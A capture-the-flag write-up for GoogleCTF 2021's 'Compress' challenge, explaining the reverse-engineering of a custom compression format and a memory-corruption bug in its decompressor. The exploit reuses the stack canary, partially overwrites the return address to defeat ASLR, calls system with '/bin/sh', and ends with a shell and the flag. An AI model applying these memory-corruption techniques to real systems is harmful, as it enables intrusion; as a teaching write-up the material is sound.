GoogleCTF 2021 - Compress

My friend developed a custom compression algorithm, but doesn’t want to share the format documentation. He keeps it on his demo server - why don’t you try to steal it?

Reconnaissance

The challenge zip file consisted a single binary executable file called compress. we started off conservatively, by running checksec to understand what are we dealing with here.

phakeobj@localbox:~/ctf/google-2021/compress$checksec compress
[*] '/home/phakeobj/ctf/google-2021/compress/compress'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    FORTIFY:  Enabled

After getting to know the security properties of the executable, we played around with it, in hope to get some understanding of the functionality and where would it make sense to find a bug. We started off by trying out the 3 available options in the menu.


phakeobj@localbox:~/ctf/google-2021/compress$./compress
What can I do for you?
1. Compress string
2. Decompress string
3. Read compression format documentation

1
Send me the hex-encoded string (max 4k):
4141414141414141
These 8 bytes compress to 11 bytes (137.50%):
54494e5941ff0107ff0000
phakeobj@localbox:~/ctf/google-2021/compress$./compress
What can I do for you?
1. Compress string
2. Decompress string
3. Read compression format documentation

2
Send me the hex-encoded string (max 4k):
54494e5941ff0107ff0000
That decompresses to:
4141414141414141
phakeobj@localbox:~/ctf/google-2021/compress$./compress
What can I do for you?
1. Compress string
2. Decompress string
3. Read compression format documentation

3
Format documentation is password protected.
Input password:
phakeobj
ERROR: wrong password

The hex-encoded string 4141414141414141 translates into 54494e5941ff0107ff0000 and backwards. The password option seemed irrelevant at the moment. There might be a bug in the input processing but no obvious functionality other than password verification. We experimented with the executable a bit further to try to understand the compressed format.

Understanding the Format

We discovered that the format starts with a constant header TINY (54494e59) and finishes with a constant footer ff0000, and that between the header and the footer there are some hex-encoded characters and what seems to be some sort of commands for the decompression engine.

Quickly enough we felt like we have exhausted the manual observations effort and decided to escalate to disassembling. By auditing the code we got a better grasp of how the compression/decompression works so we could craft our own compressed blobs. Other than the header and footer we found out that there can be byte literals, duplication command and special commands. The commands are in the format 0xff <OFFSET> <COUNT> where special commands are denoted by OFFSET = 0.

The duplicate command tells the decompressor to take the byte located OFFSET bytes behind the writing pointer, and duplicate it <COUNT> times.

When OFFSET = 0 - If COUNT = 0, the command is BYE - If COUNT = 1, the encoded byte literal is 0xff - Any other COUNT value will result in a call to error("invalid special command")

To recap, the compressed form of AAAAAAAA would be 54494e5941ff0107ff0000. When decompressing, after verifying the magic, it will face a byte that isn’t 0xff, the program will copy it as-is to output buffer and advance the writing pointer. Then, it will encounter an 0xff that encodes a duplicate command, it will copy the byte that is located 1 bytes behind the writing pointer (i.e., the first 41 that was just written to output, remember OFFSET?) 7 times (remember COUNT?). The readiong and writing pointer will always be synchronized with difference of OFFSET bytes between the reader and the writer.

While looking at the disassembly of decompress, at the part where it decodes OFFSET and COUNT, we had a strong feeling that we have already seen this block of code before. After a bit of head scratching it came to me, LEB128 which is being used by Apple in dyld shared cache, Android in dex, WebAssembly, llvm and others.

But the other thing we discovered in decompress was much more exciting.

The Bug

While the code strictly checks that the program will not read commands outside of the input buffer and that it will not write byte literals outside of the outout buffer, it makes no effort to validate where duplicate command reads from and if it writes within output bounds.

.text:0000555555555975                 mov     rdx, output_idx
.text:0000555555555978                 lea     rsi, [output+output_idx]
.text:000055555555597C                 sub     rdx, offset
.text:000055555555597F                 sub     rsi, offset
.text:0000555555555982                 add     rdx, output 			; rdx = output + output_idx - offset
.text:0000555555555985                 add     rsi, count			; rsi = output + output_idx - offset + count
.text:0000555555555988                 nop     dword ptr [rax+rax+00000000h]
.text:0000555555555988
.text:0000555555555990 rdx = outupt[output_idx - offset]
.text:0000555555555990 rsi = output[output_idx - offset + count]
.text:0000555555555990
.text:0000555555555990 duplication_loop:
.text:0000555555555990                 movzx   ecx, byte ptr [rdx]
.text:0000555555555993                 add     rdx, 1
.text:0000555555555997                 mov     [rdx+offset-1], cl
.text:000055555555599C                 cmp     rdx, rsi
.text:000055555555599F                 jnz     short duplication_loop
.text:000055555555599F
.text:00005555555559A1                 add     output_idx, count
.text:00005555555559A4                 mov     rdx, rax
.text:00005555555559A7                 jmp     read_command

rdx and rsi are being prepared for the duplication loop, rdx will point to the address we begin reading from and rsi will point to the end of the buffer that the loop writes. When offset = 1 it will duplicate the latest written to the buffer count times, but when offset != 1 it will memcpy count bytes from output + output_idx - offset. Since offset and count are both fully user controlled and aren’t validated, and since offset can be negative, we can practically read from any address we wish by giving an offset value that is relative to output + output_idx.

Primitives

Read/Write

The bug we discovered allows reading practically everything, and write past output buffer bounds. Since output was allocated in main’s stack frame we are overflowing on main’s stack frame.

Infoleak

decompress returns the amount of bytes it wrote to output, both are later used in main to print the decompressed hex-encoded string, but since we are able to read from anywhere and write past the boundaries of output, the program will then call printhex which will then print everything we copied to output to stdout.

Exploiting the Bug

Now when we have arbitrary read, limited write and an infoleak we need to make up my mind and decide on an exploitation strategy. It is clear that we have to overwrite main’s return address on the stack, but how? And what after we gain control over rip? Should we jump to somewhere within the program itself? Return to libc? Thinking needs to be done.

Both paths begins with overwriting main’s return address, so we decided to take it step-by-step, begin with gaining control over rip and then decide which path would be easier to try first.

Elegant Stack Smashing

Remember, our write primitive is monotonically increasing, even beyond the boundaries of the output buffer. Therefore, in order to gain control over rip we have to advance the writing pointer to the address of main’s return address, but then we will write over the stack canary and destroy it, won’t we?

Since we can read from anywhere and write sequentially, we can read the stack canary before we destroy it, and instead of writing meaningless garbage over it, we can point our read pointer to read the stored canary value when the writing pointer gets to the address of the stack canary. This way, without leaking the canary, we are overwriting it with its’ own value, giving us control over main’s return address and control over rip.

Where to Return To?

So having an infoleak primitive, control over rip and good control over the stack, my intuition screamed return-to-libc, but something made me take a second look at the disassembly and it immediately came to me.

.text:0000555555555339                 lea     rbp, [rsp+3348h+command]
.text:000055555555533E                 mov     rdi, rbp                            ; command
.text:0000555555555341                 call    _system

Remember the 3rd option in compress menu? When a user enters a password, it is being compared against the content of a file called FORMAT.md.password. If the passwords match, the code above will be executed, where command, the argument to system will be cat FORMAT.md. This piece of code isn’t there by mistake.

If we will be able to point rip to 0x000555555555339 and have /bin/sh in command, it’s game over.

Bypassing ASLR

ASLR’s granularity is page sized while my write primitive is byte sized, what can we do then? Pick one of the possible value (2^2) for this nibble and pray that the generated slide will match the one we selected (or simpler, re-run the exploit).

Observing the values on the stack we quickly found an address within main that is stored beyond main’s return address, so we will not destroy it before getting there, and we can use a part of this address as an ASLR slide. Now all that’s left is to write the correct page offset (with the selected nibble) that will take me to the lea instruction.

Preparing those two bytes for later use is easy. Since we can write arbitrary bytes on output before the writing pointer reaches to the end of the buffer, we can write required values to the stack beforehand, and use them when the writing pointer gets to where we need it, this time, on the address of main’s return address. After writing these two bytes, we can copy the rest of the address from the address within main that is stored on the stack, and voilĂ , with not-so-many retries (or turning off ASLR locally) we can jump to the lea instruction.

Endgame

We are now able to call system with the value of command, stored in rsp + 0x10, but rsp is not where it was expected to be, as we already executed the epilogue, so the argument to system is not even cat FORMAT.md but some random value from the stack.

Since the address of this value is writable by my write primitive, as its’ address is beyond main’s return address, and we already know how to prepare values and copy them to where we need them, so we can write /bin/sh somewhere down the stack and copy it when the writing pointer gets to the right rsp + 0x10, preparing the argument for system was an easy task.

And there it is, after a few retries (remember ASLR?) a shell popped and we were able to cat the flag.

phakeobj@localbox:~/ctf/google-2021/compress$ python3 p.py
[+] Opening connection to compression.2021.ctfcompetition.com on port 1337: Done
[*] Switching to interactive mode

That decompresses to:
39532f62696e2f73684141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414100300d4292f12ee200300d4292f12ee2414141414141414141414141414141414141414141414141414141414141414141414141414141413953fec0f2550000414141414141414141414141414141412f62696e2f7368
$ cat /flag
CTF{lz77_0r1ent3d_pr0gr4mming}